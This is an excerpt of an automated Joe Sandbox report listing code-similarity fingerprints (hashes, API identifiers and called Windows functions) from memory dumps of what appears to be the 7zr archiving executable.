                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AllocExceptionStringThrow
                                        • String ID:
                                        • API String ID: 3773818493-0
                                        • Opcode ID: bc1540757d6c20f14260c7a94d02a63995a603fb89528315c7089f269d8c9a5d
                                        • Instruction ID: 06b430b903339f96e2cb191559158dd17f93b0987b2fc668696ee2c562cbe437
                                        • Opcode Fuzzy Hash: bc1540757d6c20f14260c7a94d02a63995a603fb89528315c7089f269d8c9a5d
                                        • Instruction Fuzzy Hash: 24F065716103149BC750EF94D859D8B7BEDFF06350B40842AF945CB310E770E80087D0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$fputc
                                        • String ID:
                                        • API String ID: 1185151155-0
                                        • Opcode ID: c9887dbd6fae9c67dde8de8def416d53aedabf5e7867b69e5bd80c79d1f07d52
                                        • Instruction ID: c08eac6aa60796acfbac9ab3f280905500b7ffc1c30c070f0e465f384e082c85
                                        • Opcode Fuzzy Hash: c9887dbd6fae9c67dde8de8def416d53aedabf5e7867b69e5bd80c79d1f07d52
                                        • Instruction Fuzzy Hash: 72E08C3B20A210AFA7266B48BC018582BD7EBCA362326002BE64093360AB132C155AA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ErrorLast_beginthreadex
                                        • String ID:
                                        • API String ID: 4034172046-0
                                        • Opcode ID: a674bc14d71aa15d114830d23ab0fe73db8dd649ba8fe5fd74caf0189d45f5e1
                                        • Instruction ID: a38efa45455d665811d6aadc38468d4f538b847dabcea7b50a337aba3842f826
                                        • Opcode Fuzzy Hash: a674bc14d71aa15d114830d23ab0fe73db8dd649ba8fe5fd74caf0189d45f5e1
                                        • Instruction Fuzzy Hash: 52E0C2F62092026BF3209B60CC02FB7729DEBA0B40F40847DFA45C6280E661CD00C7F5
                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,?,005A9C6E), ref: 005A9C52
                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 005A9C59
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: Process$AffinityCurrentMask
                                        • String ID:
                                        • API String ID: 1231390398-0
                                        • Opcode ID: 7e17941c7aee1f1ad037cc6374887f13e04e790baa266b9dbd6ff1a08bfa97bf
                                        • Instruction ID: b2100f226f1aeedfdb2cbf950dec9870b9c9fb6143063dd8575def05a330de83
                                        • Opcode Fuzzy Hash: 7e17941c7aee1f1ad037cc6374887f13e04e790baa266b9dbd6ff1a08bfa97bf
                                        • Instruction Fuzzy Hash: 3FB012BA401100FFDF649BB0DD0CC163B2DEA067113005644F109C2110C637C045CB70
                                        APIs
                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 005AB843
                                        • GetLastError.KERNEL32 ref: 005AB8AA
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ErrorLastmemcpy
                                        • String ID:
                                        • API String ID: 2523627151-0
                                        • Opcode ID: babf497370df34f0e078accfc38b5f678389ee4a9bc1e4b867779d0c20da6485
                                        • Instruction ID: f696a2ad9972dd989b8f07ca9baed3c7957bf7420d867d8c7c07505e0b2edcb6
                                        • Opcode Fuzzy Hash: babf497370df34f0e078accfc38b5f678389ee4a9bc1e4b867779d0c20da6485
                                        • Instruction Fuzzy Hash: BB813D71A007069FEB64CF29C980A6EBBF6FF86314F14492DE84687A42D774F945CB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 2436765578-0
                                        • Opcode ID: 88de14ddeb27052784d36721dc1d5720367689a1d9334c89efc85a64540437c9
                                        • Instruction ID: 73ebc53cb2aae8a8918dbc28c4384c1f6ca02868f9c6bcb596c95d8554a02887
                                        • Opcode Fuzzy Hash: 88de14ddeb27052784d36721dc1d5720367689a1d9334c89efc85a64540437c9
                                        • Instruction Fuzzy Hash: 20E08C3400424CAACF105FA0D80479C3FAD6B023A9F00A015FC088E211C670C6D48748
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: b6f8455a770840f2c916c048440cc284a71637e65875b7b7ab0bc5daa03a28f0
                                        • Instruction ID: ca1622706c33b101dc82c96176f3abf8c372be6170e66d6e5054971d7fbbb4c8
                                        • Opcode Fuzzy Hash: b6f8455a770840f2c916c048440cc284a71637e65875b7b7ab0bc5daa03a28f0
                                        • Instruction Fuzzy Hash: 3B52C370904289DFEF19CFA9C588BAEBFB5BF49305F184099E885AB291C771DE41CB11
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 0b0ce10772b039df12e192bfec86aaf028ef5c2b3861b9e8e924460f8a8fd54e
                                        • Instruction ID: 0dcd23e49efaa2289a5b1dcc2687f72d30b09efcb00bbfae92bdc54646d38846
                                        • Opcode Fuzzy Hash: 0b0ce10772b039df12e192bfec86aaf028ef5c2b3861b9e8e924460f8a8fd54e
                                        • Instruction Fuzzy Hash: ABF198709047859FCF31CF64C494AEABFE1BF59304F58486EE49A8B251DB34B984CB51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: bb76eb190fe0873b16ca2f30faa2864117c66120aab378e19426ee252f6330a7
                                        • Instruction ID: 3b361ea40be3771c41dff612c2c2d30375d6e35d259253eeab374e1b900af56d
                                        • Opcode Fuzzy Hash: bb76eb190fe0873b16ca2f30faa2864117c66120aab378e19426ee252f6330a7
                                        • Instruction Fuzzy Hash: 42D18C70A04A4ADFDF28CFA5C884BEEBFB1BF48300F10492DE65597691D779A844CB94
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005ECF96
                                          • Part of subcall function 005F1511: __EH_prolog.LIBCMT ref: 005F1516
                                          • Part of subcall function 005F1511: _CxxThrowException.MSVCRT(?,0065D480), ref: 005F1561
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrow
                                        • String ID:
                                        • API String ID: 2366012087-0
                                        • Opcode ID: 8386afe2303202931b9091bc32eedd926a4b0ba48e9ab522cdea1fde92021df3
                                        • Instruction ID: 1c0d85e294dbfdbf5ea816ac22e5df2b3831740beae48fb2b3e23c552bc30832
                                        • Opcode Fuzzy Hash: 8386afe2303202931b9091bc32eedd926a4b0ba48e9ab522cdea1fde92021df3
                                        • Instruction Fuzzy Hash: 1C516171900289DFCB15CFA8C8C8BAEBBB5BF49304F18449DE89AD7242D7759E45CB21
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 990a41d0ed29f8a0abfd0dbabc7ce8769d3f52b83f7b08778d2cc50d45e2a1b2
                                        • Instruction ID: 32193d0ce78d8cae19b559e8c34d5d7509d492c07641e434f3899cd5d7000fb3
                                        • Opcode Fuzzy Hash: 990a41d0ed29f8a0abfd0dbabc7ce8769d3f52b83f7b08778d2cc50d45e2a1b2
                                        • Instruction Fuzzy Hash: 0A515B74A00606DFCB24CF68C4909AAFFB2FF89344B10496EE597AB751D331A905DF91
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 0107612ed94b541ccaa17ba7ec25e4db8c1742a857eb299a3eefb82f042626d6
                                        • Instruction ID: 090b50df4e9899cf1756a0ec97bccb7cc359aae3957e3a0cb0b7ce2fa61629e8
                                        • Opcode Fuzzy Hash: 0107612ed94b541ccaa17ba7ec25e4db8c1742a857eb299a3eefb82f042626d6
                                        • Instruction Fuzzy Hash: 9F41A170A00686DFDB28CF75C884B6ABFA5BF44310F188A6DD49697691C370FD81CB81
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B4255
                                          • Part of subcall function 005B440B: __EH_prolog.LIBCMT ref: 005B4410
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        • String ID:
                                        • API String ID: 3744649731-0
                                        • Opcode ID: f41d70819df441a617e173b3c19fba6204abf7a16261a09f08b76426434b672b
                                        • Instruction ID: 413a9523b36edf7c270d84f7d143cb39f3c813f5272b4e5c663be62b660596ef
                                        • Opcode Fuzzy Hash: f41d70819df441a617e173b3c19fba6204abf7a16261a09f08b76426434b672b
                                        • Instruction Fuzzy Hash: 3151F3B0801B84CFC725DF69C1886DAFFF4BF19304F5588AEC49A97652D7B0A608CB61
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005CD0E6
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                         • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prologThrowmalloc
                                        • String ID:
                                        • API String ID: 3978722251-0
                                        • Opcode ID: 6b7ac4e7c6414c6d3f6328bbefffde49156b0ce4cf8e764a6f08e2b10fa2b1d8
                                        • Instruction ID: 7d4a6f65f5db8d284b5c172218bd9ad85dc211891c733ad88994743af4fab86a
                                        • Opcode Fuzzy Hash: 6b7ac4e7c6414c6d3f6328bbefffde49156b0ce4cf8e764a6f08e2b10fa2b1d8
                                        • Instruction Fuzzy Hash: CE41C771A002559FDB10DFA8C845BAEFFB5BF85310F18446DE445D7281C7709D41C7A1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B7FCA
                                          • Part of subcall function 005A950D: SysAllocStringLen.OLEAUT32(?,?), ref: 005A952C
                                          • Part of subcall function 005A950D: _CxxThrowException.MSVCRT(?,006555B8), ref: 005A954A
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: AllocExceptionH_prologStringThrow
                                        • String ID:
                                        • API String ID: 1940201546-0
                                        • Opcode ID: feca052fe2378f706b6228bb91e4fe9ce6aa741d27f04fd3a641ad991e56a6bc
                                        • Instruction ID: 1ccbdf1ac6f8f76aebe73c23751d7cafb725f761d1bf1a333ab9b8cbba3d9363
                                        • Opcode Fuzzy Hash: feca052fe2378f706b6228bb91e4fe9ce6aa741d27f04fd3a641ad991e56a6bc
                                        • Instruction Fuzzy Hash: A331A07282010ECACF14BFA4C859DFE7F78FF59394F406469E012A7162EE31AA08C751
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005DADBC
                                          • Part of subcall function 005DAD29: __EH_prolog.LIBCMT ref: 005DAD2E
                                          • Part of subcall function 005DAF2D: __EH_prolog.LIBCMT ref: 005DAF32
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 62851b3b20d0ad2827d71525f61a9054c55f2c49e0b14e6ec80112dea80f8b02
                                        • Instruction ID: 6ac281bfe3e0ffd19a513fe3992897939f51a78431155ef673d4e4654f61a425
                                        • Opcode Fuzzy Hash: 62851b3b20d0ad2827d71525f61a9054c55f2c49e0b14e6ec80112dea80f8b02
                                        • Instruction Fuzzy Hash: DE41B97144ABC1DEC326DF7881656DAFFE06F26200F94899EC4EA43752D670A60CC766
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 4a07ed25cdf3513eccd9201fcc34e75546765fe08fde7d3bf6e584e5033bb586
                                        • Instruction ID: bc2d4a45bee63cedc0d23470803b2511afcb89aff0395711fb26e74e01fae455
                                        • Opcode Fuzzy Hash: 4a07ed25cdf3513eccd9201fcc34e75546765fe08fde7d3bf6e584e5033bb586
                                        • Instruction Fuzzy Hash: 3031F6B0900219DFCB14EF95C895DAEFFB5FFD4364B20951EE42667291C7309A41CBA0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C98F7
                                          • Part of subcall function 005C9987: __EH_prolog.LIBCMT ref: 005C998C
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: a481239321a8c2fe4ef1a1a0ea217671159e641221d6a9ce34e5841bdc9bba94
                                        • Instruction ID: 318889a21e767df132cf921e99cc1040be05fe2fc579140fcf945a3f4067a6be
                                        • Opcode Fuzzy Hash: a481239321a8c2fe4ef1a1a0ea217671159e641221d6a9ce34e5841bdc9bba94
                                        • Instruction Fuzzy Hash: 4D1149356002459FDB14CFA9C888FAAB7B9FF89350F14895CF856DB2A1CB31E900CB60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C021F
                                          • Part of subcall function 005B3D66: __EH_prolog.LIBCMT ref: 005B3D6B
                                          • Part of subcall function 005B3D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D7D
                                          • Part of subcall function 005B3D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D94
                                          • Part of subcall function 005B3D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 005B3DB6
                                          • Part of subcall function 005B3D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DCB
                                          • Part of subcall function 005B3D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DD5
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID:
                                        • API String ID: 1532160333-0
                                        • Opcode ID: 3a2e1e619e453c492cd7bc6c96871fbad7edf183d79f65d652641e9ee51a49ad
                                        • Instruction ID: 85050befd4e2a43ef2e6c26412d04b7599ea910a59251b44b9fa0e6ccb4abcd9
                                        • Opcode Fuzzy Hash: 3a2e1e619e453c492cd7bc6c96871fbad7edf183d79f65d652641e9ee51a49ad
                                        • Instruction Fuzzy Hash: 372139B1846B90CFC321CF6A82D0686FFF4BB19600B94996EC0DA83B12C770A508CF55
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C1C74
                                          • Part of subcall function 005A6C72: __EH_prolog.LIBCMT ref: 005A6C77
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 35c600a539f49ac9223021c224101e23e164bf0f59e4a175685ac7cf491c5691
                                        • Instruction ID: deb3cad1bb4a75854c8e33d752f9614a600fb4096f77ac12adfb9a5d02916cc5
                                        • Opcode Fuzzy Hash: 35c600a539f49ac9223021c224101e23e164bf0f59e4a175685ac7cf491c5691
                                        • Instruction Fuzzy Hash: 8C11CB31900A068FCF19EBE4C85ABEDBF79BF96350F00002CE80223193DB611D46C698
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B7E5F
                                          • Part of subcall function 005A6C72: __EH_prolog.LIBCMT ref: 005A6C77
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                          • Part of subcall function 005A757D: GetLastError.KERNEL32(005AD14C), ref: 005A757D
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ErrorLastfree
                                        • String ID:
                                        • API String ID: 683690243-0
                                        • Opcode ID: add0894aca47a92654aff856c01fb10dcfb663c6421bc250e2c55a35d8fb3a8e
                                        • Instruction ID: 8adaefad9990d4d7743382331e9aa72af13d9f40363284a14a8c83895eb1b61e
                                        • Opcode Fuzzy Hash: add0894aca47a92654aff856c01fb10dcfb663c6421bc250e2c55a35d8fb3a8e
                                        • Instruction Fuzzy Hash: 4A010872A447059FC721EF74C4929DEBFB5FF89310F00452EE44353692CA30A909CA50
                                        APIs
